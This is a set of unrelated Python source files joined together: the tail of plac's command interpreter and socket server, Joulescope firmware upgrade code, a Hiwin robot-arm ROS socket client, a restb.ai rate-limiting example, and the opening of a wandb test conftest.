is a manager for each interpreter with mpcommands.
"""
def __init__(self):
self.registry = {}
self.started = False
self.mp = None
def add(self, monitor):
'Add or replace a monitor in the registry'
proc = multiprocessing.Process(None, monitor.start, monitor.name)
proc.queue = monitor.queue
self.registry[monitor.name] = proc
def delete(self, name):
'Remove a named monitor from the registry'
del self.registry[name]
# can be called more than once
def start(self):
if self.mp is None:
self.mp = multiprocessing.Manager()
for monitor in self.registry.values():
monitor.start()
self.started = True
def stop(self):
for monitor in self.registry.values():
monitor.queue.close()
monitor.terminate()
if self.mp:
self.mp.shutdown()
self.mp = None
self.started = False
def notify_listener(self, taskno, msg):
for monitor in self.registry.values():
monitor.queue.put(('notify_listener', taskno, msg))
def add_listener(self, no):
for monitor in self.registry.values():
monitor.queue.put(('add_listener', no))
# ######################### plac server ############################# #
import asyncore
import asynchat
import socket
class _AsynHandler(asynchat.async_chat):
"asynchat handler starting a new interpreter loop for each connection"
terminator = '\r\n' # the standard one for telnet
prompt = 'i> '
def __init__(self, socket, interpreter):
asynchat.async_chat.__init__(self, socket)
self.set_terminator(self.terminator)
self.i = interpreter
self.i.__enter__()
self.data = []
self.write(self.prompt)
def write(self, data, *args):
"Push a string back to the client"
if args:
data %= args
if data.endswith('\n') and not data.endswith(self.terminator):
data = data[:-1] + self.terminator # fix newlines
self.push(data)
def collect_incoming_data(self, data):
"Collect one character at the time"
self.data.append(data)
def found_terminator(self):
"Put in the queue the line received from the client"
line = ''.join(self.data)
self.log('Received line %r from %s' % (line, self.addr))
if line == 'EOF':
self.i.__exit__(None, None, None)
self.handle_close()
else:
task = self.i.submit(line)
task.run() # synchronous or not
if task.etype: # manage exception
error = '%s: %s\nReceived: %s' % (
task.etype.__name__, task.exc, ' '.join(task.arglist))
self.log_info(task.traceback + error) # on the server
self.write(error + self.terminator) # back to the client
else: # no exception
self.write(task.str + self.terminator)
self.data = []
self.write(self.prompt)
class _AsynServer(asyncore.dispatcher):
"asyncore-based server spawning AsynHandlers"
def __init__(self, interpreter, newhandler, port, listen=5):
self.interpreter = interpreter
self.newhandler = newhandler
self.port = port
asyncore.dispatcher.__init__(self)
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.bind(('', port))
self.listen(listen)
def handle_accept(self):
clientsock, clientaddr = self.accept()
self.log('Connected from %s' % str(clientaddr))
i = self.interpreter.__class__(self.interpreter.obj) # new interpreter
self.newhandler(clientsock, i) # spawn a new handler
# ########################## the Interpreter ############################ #
class Interpreter(object):
"""
A context manager with a .send method and a few utility methods:
execute, test and doctest.
"""
class Exit(Exception):
pass
def __init__(self, obj, commentchar='#', split=shlex.split):
self.obj = obj
try:
self.name = obj.__module__
except AttributeError:
self.name = 'plac'
self.commentchar = commentchar
self.split = split
self._set_commands(obj)
self.tm = TaskManager(obj)
self.man = self.tm.man
self.parser = self.tm.parser
if self.commands:
self.parser.addsubcommands(
self.tm.specialcommands, self.tm, title='special commands')
if obj.mpcommands:
self.parser.addsubcommands(
obj.mpcommands, obj,
title='commands run in external processes')
if obj.thcommands:
self.parser.addsubcommands(
obj.thcommands, obj, title='threaded commands')
self.parser.error = lambda msg: sys.exit(msg) # patch the parser
self._interpreter = None
def _set_commands(self, obj):
"Make sure obj has the right command attributes as Python sets"
for attrname in ('commands', 'mpcommands', 'thcommands'):
setattr(self, attrname, set(getattr(self.__class__, attrname, [])))
setattr(obj, attrname, set(getattr(obj, attrname, [])))
self.commands = obj.commands
self.mpcommands.update(obj.mpcommands)
self.thcommands.update(obj.thcommands)
if (obj.commands or obj.mpcommands or obj.thcommands) and \
not hasattr(obj, 'help'): # add default help
obj.help = default_help.__get__(obj, obj.__class__)
self.commands.add('help')
def __enter__(self):
"Start the inner interpreter loop"
self._interpreter = self._make_interpreter()
self._interpreter.send(None)
return self
def __exit__(self, exctype, exc, tb):
"Close the inner interpreter and the task manager"
self.close(exctype, exc, tb)
def submit(self, line):
"Send a line to the underlying interpreter and return a task object"
if self._interpreter is None:
raise RuntimeError(_('%r not initialized: probably you forgot to '
'use the with statement') % self)
if isinstance(line, (str, bytes)):
arglist = self.split(line, self.commentchar)
else: # expects a list of strings
arglist = line
if not arglist:
return nulltask
m = self.tm.man # manager
if m and not m.started:
m.start()
task = self._interpreter.send(arglist) # nonblocking
if not plac_core._match_cmd(arglist[0], self.tm.specialcommands):
self.tm.registry[task.no] = task
if m:
m.add_listener(task.no)
return task
def send(self, line):
"""Send a line to the underlying interpreter and return
the finished task"""
task = self.submit(line)
BaseTask.run(task) # blocking
return task
def tasks(self):
"The full lists of the submitted tasks"
return self.tm.registry.values()
def close(self, exctype=None, exc=None, tb=None):
"Can be called to close the interpreter prematurely"
self.tm.close()
if exctype is not None:
self._interpreter.throw(exctype, exc, tb)
else:
self._interpreter.close()
def _make_interpreter(self):
"The interpreter main loop, from lists of arguments to task objects"
enter = getattr(self.obj, '__enter__', lambda: None)
exit = getattr(self.obj, '__exit__', lambda et, ex, tb: None)
enter()
task = None
try:
for no in itertools.count(1):
arglist = yield task
try:
cmd, result = self.parser.consume(arglist)
except SystemExit as e: # for invalid commands
if e.args == (0,): # raised as sys.exit(0)
errlist = []
else:
errlist = [str(e)]
task = SynTask(no, arglist, iter(errlist))
continue
except: # anything else
task = SynTask(no, arglist, gen_exc(*sys.exc_info()))
continue
if not plac_core.iterable(result): # atomic result
task = SynTask(no, arglist, gen_val(result))
elif cmd in self.obj.mpcommands:
task = MPTask(no, arglist, result, self.tm.man)
elif cmd in self.obj.thcommands:
task = ThreadedTask(no, arglist, result)
else: # blocking task
task = SynTask(no, arglist, result)
except GeneratorExit: # regular exit
exit(None, None, None)
except: # exceptional exit
exit(*sys.exc_info())
raise
def check(self, given_input, expected_output):
"Make sure you get the expected_output from the given_input"
output = self.send(given_input).str # blocking
ok = (output == expected_output)
if not ok:
# the message here is not internationalized on purpose
msg = 'input: %s\noutput: %s\nexpected: %s' % (
given_input, output, expected_output)
raise AssertionError(msg)
def _parse_doctest(self, lineiter):
"Returns the lines of input, the lines of output, and the line number"
lines = [line.strip() for line in lineiter]
inputs = []
positions = []
for i, line in enumerate(lines):
if line.startswith('i> '):
inputs.append(line[3:])
positions.append(i)
positions.append(len(lines) + 1) # last position
outputs = []
for i, start in enumerate(positions[:-1]):
end = positions[i + 1]
outputs.append('\n'.join(lines[start+1:end]))
return zip(inputs, outputs, positions)
def doctest(self, lineiter, verbose=False):
"""
Parse a text containing doctests in a context and tests of all them.
Raise an error even if a single doctest if broken. Use this for
sequential tests which are logically grouped.
"""
with self:
try:
for input, output, no in self._parse_doctest(lineiter):
if verbose:
write('i> %s\n' % input)
write('-> %s\n' % output)
task = self.send(input) # blocking
if not str(task) == output:
msg = ('line %d: input: %s\noutput: %s\nexpected: %s\n'
% (no + 1, input, task, output))
write(msg)
if task.exc:
raise_(task.etype, task.exc, task.tb)
except self.Exit:
pass
def execute(self, lineiter, verbose=False):
"Execute a lineiter of commands in a context and print the output"
with self:
try:
for line in lineiter:
if verbose:
write('i> ' + line)
task = self.send(line) # finished task
if task.etype: # there was an error
raise_(task.etype, task.exc, task.tb)
write('%s\n' % task.str)
except self.Exit:
pass
def multiline(self, stdin=sys.stdin, terminator=';', verbose=False):
"The multiline mode is especially suited for usage with emacs"
with self:
try:
for line in read_long_line(stdin, terminator):
task = self.submit(line)
task.run()
write('%s\n' % task.str)
if verbose and task.traceback:
write(task.traceback)
except self.Exit:
pass
def interact(self, stdin=sys.stdin, prompt='i> ', verbose=False):
"Starts an interactive command loop reading commands from the consolle"
try:
import readline
readline_present = True
except ImportError:
readline_present = False
if stdin is sys.stdin and readline_present: # use readline
histfile = os.path.expanduser('~/.%s.history' % self.name)
completions = list(self.commands) + list(self.mpcommands) + \
list(self.thcommands) + list(self.tm.specialcommands)
self.stdin = ReadlineInput(completions, histfile=histfile)
else:
self.stdin = stdin
self.prompt = prompt
self.verbose = verbose
intro = self.obj.__doc__ or ''
write(intro + '\n')
with self:
self.obj._interact_ = True
if self.stdin is sys.stdin: # do not close stdin automatically
self._manage_input()
else:
with self.stdin: # close stdin automatically
self._manage_input()
def _manage_input(self):
"Convert input lines into task which are then executed"
try:
for line in iter(lambda: read_line(self.stdin, self.prompt), ''):
line = line.strip()
if not line:
continue
task = self.submit(line)
task.run() # synchronous or not
write(str(task) + '\n')
if self.verbose and task.etype:
write(task.traceback)
except self.Exit:
pass
def start_server(self, port=2199, **kw):
"""Starts an asyncore server reading commands for clients and opening
a new interpreter for each connection."""
_AsynServer(self, _AsynHandler, port) # register the server
try:
asyncore.loop(**kw)
except (KeyboardInterrupt, TerminatedProcess):
pass
finally:
asyncore.close_all()
def add_monitor(self, mon):
self.man.add(mon)
def del_monitor(self, name):
self.man.delete(name)
@classmethod
def call(cls, factory, arglist=sys.argv[1:],
commentchar='#', split=shlex.split,
stdin=sys.stdin, prompt='i> ', verbose=False):
"""
Call a container factory with the arglist and instantiate an
interpreter object. If there are remaining arguments, send them to the
interpreter, else start an interactive session.
"""
obj = partial_call(factory, arglist)
i = cls(obj, commentchar, split)
if i.obj._args_:
with i:
task = i.send(i.obj._args_) # synchronous
if task.exc:
raise_(task.etype, task.exc, task.tb)
out = str(task)
if out:
print(out)
elif i.obj._interact_:
i.interact(stdin, prompt, verbose)
else:
i.parser.print_usage()
# ################################## runp ################################### #
class _TaskLauncher(object):
"Helper for runp"
def __init__(self, genseq, mode):
if mode == 'p':
self.mpcommands = ['rungen']
else:
self.thcommands = ['rungen']
self.genlist = list(genseq)
def rungen(self, i):
for out in self.genlist[int(i) - 1]:
yield out
def runp(genseq, mode='p'):
"""Run a sequence of generators in parallel. Mode can be 'p' (use processes)
or 't' (use threads). After all of them are finished, return a list of
task objects.
"""
assert mode in 'pt', mode
launcher = _TaskLauncher(genseq, mode)
res = []
with Interpreter(launcher) as inter:
for i in range(len(launcher.genlist)):
inter.submit('rungen %d' % (i + 1)).run()
for task in inter.tasks():
try:
res.append(task.result)
except Exception as e:
res.append(e)
return res
|
firmware_manager.py
|
# Copyright 2019 Jetperch LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from joulescope.bootloader import Bootloader
from joulescope.driver import bootloader_go
from zipfile import ZipFile
import monocypher
import binascii
import json
import logging
import threading
log = logging.getLogger(__name__)
SIGNING_KEY_PUBLIC = binascii.unhexlify(b'32fe2bed04bbc42fe1b382e0371ba95ec2947045e8d919e49fdef601e24c105e')
VERSIONS = {
'namespace': 'joulescope',
'type': 'firmware-versions',
'version': 1,
'data': {
'format': 'js110_{version}.img',
# alpha
# beta
'production': '1.1.0',
'available': ['1.1.0']
}
}
def load(path):
with ZipFile(path, mode='r') as f_zip:
with f_zip.open('index.json', 'r') as f:
index_bytes = f.read()
with f_zip.open('index.sig', 'r') as f:
index_sig = binascii.unhexlify(f.read())
if not monocypher.signature_check(index_sig, SIGNING_KEY_PUBLIC, index_bytes):
log.warning('integrity check failed: index.json')
return None
index = json.loads(index_bytes.decode('utf-8'))
for image in index['target']['images']:
with f_zip.open(index['data'][image]['image'], 'r') as f:
index['data'][image]['image'] = f.read()
sig = binascii.unhexlify(index['data'][image]['signature'])
if not monocypher.signature_check(sig, SIGNING_KEY_PUBLIC, index['data'][image]['image']):
log.warning('integrity check failed: %s' % (image, ))
return None
return index
def version_required(release=None):
release = 'production' if release is None else str(release)
v = VERSIONS['data'][release]
return tuple([int(x) for x in v.split('.')])
class UpgradeThread:
def __init__(self, device, image, progress_cbk, stage_cbk, done_cbk):
self.device = device
self.image = image
self.progress_cbk = progress_cbk
self.stage_cbk = stage_cbk
self.done_cbk = done_cbk
def run(self):
d = None
try:
d = upgrade(self.device, self.image, self.progress_cbk, self.stage_cbk)
finally:
self.done_cbk(d)
def upgrade(device, image, progress_cbk=None, stage_cbk=None, done_cbk=None):
"""Full upgrade the device's firmware.
:param device: The :class:`Device` or class:`bootloader.Bootloader` instance
that must already be open.
:param image: The image returned by :func:`load`. Alternatively, a path
suitable for :func:`load`.
:param progress_cbk: The optional Callable[float] which is called
with the progress fraction from 0.0 to 1.0
:param stage_cbk: The optional Callable[str] which is called with a
meaningful stage description for each stage of the upgrade process.
:param done_cbk: The optional Callback[object] which is called with
the device on success or None on failure. If done_cbk is provided,
then run the upgrade in its own thread.
:return: The :class:`Device` which is closed.
raise IOError: on failure.
"""
if done_cbk is not None:
t = UpgradeThread(device, image, progress_cbk, stage_cbk, done_cbk)
thread = threading.Thread(name='fw_upgrade', target=t.run)
thread.start()
return thread
try:
cbk_data = {
'stages': [
('Load image', 0.05),
('Start bootloader', 0.05),
('Program application', 0.1),
('Start application', 0.05),
('Program sensor', 0.75),
('Done', 0.0),
],
'stage': -1,
}
def next_stage():
cbk(1.0)
cbk_data['stage'] += 1
s, _ = cbk_data['stages'][cbk_data['stage']]
log.info('firmware_upgrade: %s', s)
if stage_cbk:
stage_cbk(s)
def cbk(progress):
previous = 0.0
for idx in range(cbk_data['stage']):
previous += cbk_data['stages'][idx][1]
current = cbk_data['stages'][cbk_data['stage']][1]
if progress_cbk:
progress_cbk(previous + progress * current)
next_stage()
if isinstance(image, str):
image = load(image)
next_stage()
if not isinstance(device, Bootloader):
b, _ = device.bootloader(progress_cbk=cbk)
else:
b = device
try:
next_stage()
rc = b.firmware_program(image['data']['controller']['image'], progress_cbk=cbk)
if rc:
raise IOError('controller firmware programming failed: %d', rc)
next_stage()
except:
b.close()
raise
d = bootloader_go(b, progress_cbk=cbk)
next_stage()
d.open()
try:
d.sensor_firmware_program(image['data']['sensor']['image'], progress_cbk=cbk)
finally:
d.close()
if done_cbk:
done_cbk(d)
return d
except:
if done_cbk:
done_cbk(None)
raise
def run():
import sys
from joulescope.driver import scan_require_one
with scan_require_one() as d:
upgrade(d, sys.argv[1], progress_cbk=print, stage_cbk=print)
if __name__ == '__main__':
run()
|
Hiwin_RT605_ArmCommand_Socket_20190627203904.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import socket
##多執行序
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
#Socket = 0
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
NAME = 'socket_server'
arm_mode_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0.0,36.8,11.35,-90.0,0.0,0.0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0.0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
class StateFeedback():
def __init__(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(0,0)
class client():
def __init__(self):
#self.get_connect()
pass
def get_connect(self):
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.connect(('192.168.0.1', 8080))
def send(self, msg):
self.s.send(msg.encode('utf-8')) #用utf-8來encode,還有其他encode的方法,str用utf-8就OK!
def get_recieve(self):
data = self.s.recv(1024) #1024指定buffer的大小,限制一次收多少
data.decode('utf-8')
return data
def close(self):
self.s.close()
Socket = client()
def point_data(x,y,z,pitch,roll,yaw): ##接收策略端傳送位姿資料
pos.x = x
pos.y = y
pos.z = z
pos.pitch = pitch
pos.roll = roll
pos.yaw = yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ##接收策略端傳送手臂模式資料
global arm_mode_flag
socket_cmd.action = action
socket_cmd.grip = grip
socket_cmd.ra = ra
socket_cmd.setvel = setvel
socket_cmd.setboth = setboth
arm_mode_flag = True
Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ##接收策略端傳送手臂模式資料
socket_cmd.Speedmode = speedmode
def socket_talker(): ##創建Server node
pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(10) # 10hz
print ("Ready to connect")
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32MultiArray()
state.data = [state_feedback.ArmState,state_feedback.SentFlag]
pub.publish(state)
rate.sleep()
##----------socket 封包傳輸--------------##
##---------------socket 傳輸手臂命令-----------------
def Socket_command():
global arm_mode_flag,data
# if arm_mode_flag == True:
# arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 6 ##切換初始mode狀態
print(data)
print("Socket:", s)
#Socket.send(data.encode('utf-8'))#socket傳送for python to translate str
s.send(data)
##-----------socket client--------
def socket_client():
#global Socket
try:
Socket = client()
Socket.get_connect()
#Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
print('Connection has been successful')
except socket.error as msg:
print(msg)
sys.exit(1)
#print('Connection has been successful')
Socket_feedback(Socket)
rospy.on_shutdown(myhook)
Socket.close()
def Socket_feedback(s):
Socket = s
while 1:
feedback_str = Socket.get_recieve()
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '48':# F 手臂為Ready狀態準備接收下一個運動指令
state_feedback.ArmState = 0
if str(feedback_str[2]) == '49':# T 手臂為忙碌狀態無法執行下一個運動指令
state_feedback.ArmState = 1
if str(feedback_str[2]) == '54':# 6 策略完成
state_feedback.ArmState = 6
print("shutdown")
#確認傳送旗標
if str(feedback_str[4]) == '48':#回傳0 false
state_feedback.SentFlag = 0
if str(feedback_str[4]) == '49':#回傳1 true
state_feedback.SentFlag = 1
##---------------socket 傳輸手臂命令 end-----------------
if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
break
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 6##切換初始mode狀態
## 多執行緒
t = threading.Thread(target=socket_client)
t.start() # 開啟多執行緒
#time.sleep(1)
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
## 多執行序 end
|
rate_limiting_robust.py
|
import json
import time
import multiprocessing.dummy as mp
from restb.sdk import *
from restb.sdk.api import service
# set allotted number of requests per second
# this is defined here as it could be retrieved through some external mechanism
__requests_per_second = 4
__waiting_threads = 10
# lambda helper for getting current time in millis
now_millis = lambda: int(round(time.time() * 1000))
def test_api(client_key):
# 1. create test image data and both processing and result queues
urls = ['https://demo.restb.ai/images/demo/demo-1.jpg',
'https://demo.restb.ai/images/demo/demo-2.jpg',
'https://demo.restb.ai/images/demo/demo-3.jpg',
'https://demo.restb.ai/images/demo/demo-4.jpg',
'https://demo.restb.ai/images/demo/demo-5.jpg',
'https://demo.restb.ai/images/demo/demo-6.jpg']
queue = mp.Queue()
image_id = 1
for url in urls:
for model in __MODELS:
queue.put(dict(id=image_id, url=url, model=model))
image_id += 1
results = mp.Queue()
# 2. Pick which API endpoint to use (US vs. EU)
url = __URL_US
# 3. Define concurrency specific objects
# stats objects
lock_stats = mp.Lock()
counter = mp.Value('i', 0)
avg_req_time = mp.Value('f', 0)
time_start = mp.Value('f', 999999999999999)
time_end = mp.Value('f', 0)
# concurrency control objects
lock_bucket = mp.Lock()
bucket = mp.Queue()
# pre-seed bucket
for i in range(__requests_per_second):
bucket.put('token')
# 4. Spawn processes/threads to process the images in the queue
# first start bucket refill thread
refill_thread = mp.Process(target=bucket_refill_thread, args=(lock_bucket, bucket))
refill_thread.start()
pool = []
for i in range(__requests_per_second * __waiting_threads): # waiting threads to keep the pipeline full
# pass in necessary parameters to thread, including client key, etc.
p = mp.Process(target=image_process_thread,
args=(url, client_key, queue, results,
lock_stats, counter, avg_req_time, time_start, time_end,
lock_bucket, bucket))
pool.append(p)
p.start()
# 5. clean-up after queue has been processed with "poison pill"
while not queue.empty():
# wait for queue to be processed
time.sleep(1)
for i in pool:
# seed shutdown messages / poison pills
queue.put(dict(id=-1, url='shutdown', model='shutdown'))
for p in pool:
# enforce clean shutdown of threads
p.join()
# stop bucket refill thread
bucket.put('shutdown')
refill_thread.join()
# 6. finally, return accumulated results
total = time_end.value - time_start.value
print('[{requests}] requests processed in [{seconds}] seconds with average time [{time}] ms, total throughput: [{throughput}] rps'.format(
requests=counter.value,
seconds=str(round(total / 1000.0, 1)),
time=str(round(avg_req_time.value / counter.value, 0)),
throughput=str(round(counter.value / (total / 1000.0), 2))
))
return results
def bucket_refill_thread(lock_bucket, bucket):
while True:
# (re-)establish parameters
interval = float(1.0)
tokens = __requests_per_second
# sleep for interval
# the blow section breaks intervals apart into smaller chunks in order to smooth out bursting
# for example, 8 rps can be broken down into: 2 requests / 250 ms
if __requests_per_second > 1:
for i in range(__requests_per_second-1, 1):
if __requests_per_second % i == 0:
interval = 1 / float(i)
tokens = __requests_per_second / i
break
time.sleep(interval)
# check for poison pill
lock_bucket.acquire()
size = bucket.qsize()
shutdown = False
for i in range(size):
try:
token = bucket.get(block=False)
if 'shutdown' == token:
shutdown = True
break
else:
bucket.put(token)
except:
pass
if shutdown:
break
# don't let the bucket exceed token capacity
while bucket.qsize() < min(size + tokens, __requests_per_second):
bucket.put('token')
lock_bucket.release()
def image_process_thread(url, client_key, queue, results,
lock_stats, counter, avg_req_time, time_start, time_end,
lock_bucket, bucket):
while True:
# acquire token in order to process
lock_bucket.acquire()
token = None
try:
token = bucket.get(block=False) # don't do anything with the token, just remove it, as it acts as our "access rights"
except:
pass
# first release lock
lock_bucket.release()
# then proceed or sleep
if not token:
time.sleep(1 / float(__requests_per_second))
continue
# get image URL entry to process
entry = None
try:
entry = queue.get(block=False)
except:
pass
if entry:
image_id = entry['id']
img_url = entry['url']
model_id = entry['model']
if img_url == 'shutdown':
print('thread shutting down')
break
params = __PARAMS.copy() # note the module variables as defined in restb/sdk/__init__.py
params['client_key'] = client_key
params['image_url'] = img_url
params['model_id'] = model_id
endpoint = __ENDPOINT
start_time = now_millis()
resp = service(url=url, endpoint=endpoint, params=params)
end_time = now_millis()
msg = '[{http}] thread [{thread}] {msg}'
vals = None
if resp is not None:
vals = json.loads(resp.text)
if vals and 'response' in vals:
results.put(dict(id=image_id, model=model_id, result=vals['response']))
total = end_time - start_time
print(msg.format(
http=resp.status_code,
thread=mp.current_process().name,
msg='processed request in [' + str(total) + '] ms')
)
# increment counter
lock_stats.acquire()
counter.value += 1
avg_req_time.value += total
if start_time < time_start.value:
time_start.value = start_time
if end_time > time_end.value:
time_end.value = end_time
lock_stats.release()
elif vals and (resp.status_code == 429 or ('error_id' in vals and vals['error_id'] == '005')): # handle legacy 005 errors for now
# handle over-rate limit retrying
print(msg.format(
http=resp.status_code,
thread=mp.current_process().name,
msg='surpassed rate limit, trying again')
)
# re-queue entry and try again
queue.put(entry)
else:
print('Request failed with response: {}'.format(resp))
def run(client_key):
output = test_api(client_key)
print('\n\nFinal results queue:')
results = {}
while not output.empty():
# accumulate differing solution results for an image ID together
result = output.get()
if result['id'] not in results:
results[result['id']] = {result['model']: result['result']}
else:
results[result['id']][result['model']] = result['result']
for i in range(len(results.keys())):
for k, v in sorted(results[i+1].items()):
print('[{id}] [{model}] {res}'.format(id=i+1, model=k, res=v))
|
conftest.py
|
import atexit
from contextlib import contextmanager
import datetime
import logging
import os
import platform
import shutil
import subprocess
import sys
import tempfile
import time
import threading
from unittest import mock
from unittest.mock import MagicMock
import click
from click.testing import CliRunner
import git
import nbformat
import psutil
import pytest
import requests
from six.moves import queue, urllib
import webbrowser
from tests import utils
import wandb
from wandb import wandb_sdk
from wandb.proto import wandb_internal_pb2 as pb
from wandb.sdk.interface.interface_queue import InterfaceQueue
from wandb.sdk.internal.handler import HandleManager
from wandb.sdk.internal.sender import SendManager
from wandb.sdk.lib.module import unset_globals
from wandb.sdk.lib.git import GitRepo
from wandb.util import mkdir_exists_ok
DUMMY_API_KEY = "1824812581259009ca9981580f8f8a9012409eee"
class ServerMap(object):
def __init__(self):
self._map = {}
def items(self):
return self._map.items()
def __getitem__(self, worker_id):
if self._map.get(worker_id) is None:
self._map[worker_id] = start_mock_server(worker_id)
return self._map[worker_id]
servers = ServerMap()
def test_cleanup(*args, **kwargs):
print("Shutting down mock servers")
for wid, server in servers.items():
print("Shutting down {}".format(wid))
server.terminate()
print("Open files during tests: ")
proc = psutil.Process()
print(proc.open_files())
def start_mock_server(worker_id):
"""We start a flask server process for each pytest-xdist worker_id"""
port = utils.free_port()
root = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
path = os.path.join(root, "tests", "utils", "mock_server.py")
command = [sys.executable, "-u", path]
env = os.environ
env["PORT"] = str(port)
env["PYTHONPATH"] = root
logfname = os.path.join(
root, "tests", "logs", "live_mock_server-{}.log".format(worker_id)
)
logfile = open(logfname, "w")
server = subprocess.Popen(
command,
stdout=logfile,
env=env,
stderr=subprocess.STDOUT,
bufsize=1,
close_fds=True,
)
server._port = port
server.base_url = f"http://localhost:{server._port}"
def get_ctx():
return requests.get(server.base_url + "/ctx").json()
def set_ctx(payload):
return requests.put(server.base_url + "/ctx", json=payload).json()
def reset_ctx():
return requests.delete(server.base_url + "/ctx").json()
server.get_ctx = get_ctx
server.set_ctx = set_ctx
server.reset_ctx = reset_ctx
started = False
for i in range(10):
try:
res = requests.get("%s/ctx" % server.base_url, timeout=5)
if res.status_code == 200:
started = True
break
print(f"Attempting to connect but got: {res}")
except requests.exceptions.RequestException:
print(
"Timed out waiting for server to start...", server.base_url, time.time()
)
if server.poll() is None:
time.sleep(1)
else:
raise ValueError("Server failed to start.")
if started:
print("Mock server listing on {} see {}".format(server._port, logfname))
else:
server.terminate()
print("Server failed to launch, see {}".format(logfname))
try:
print("=" * 40)
with open(logfname) as f:
for logline in f.readlines():
print(logline.strip())
print("=" * 40)
except Exception as e:
print("EXCEPTION:", e)
raise ValueError("Failed to start server! Exit code %s" % server.returncode)
return server
atexit.register(test_cleanup)
@pytest.fixture
def test_name(request):
# change "test[1]" to "test__1__"
name = urllib.parse.quote(request.node.name.replace("[", "__").replace("]", "__"))
return name
@pytest.fixture
def test_dir(test_name):
orig_dir = os.getcwd()
root = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
test_dir = os.path.join(root, "tests", "logs", test_name)
if os.path.exists(test_dir):
shutil.rmtree(test_dir)
mkdir_exists_ok(test_dir)
os.chdir(test_dir)
yield test_dir
os.chdir(orig_dir)
@pytest.fixture
def disable_git_save():
with mock.patch.dict("os.environ", WANDB_DISABLE_GIT="true"):
yield
@pytest.fixture
def git_repo(runner):
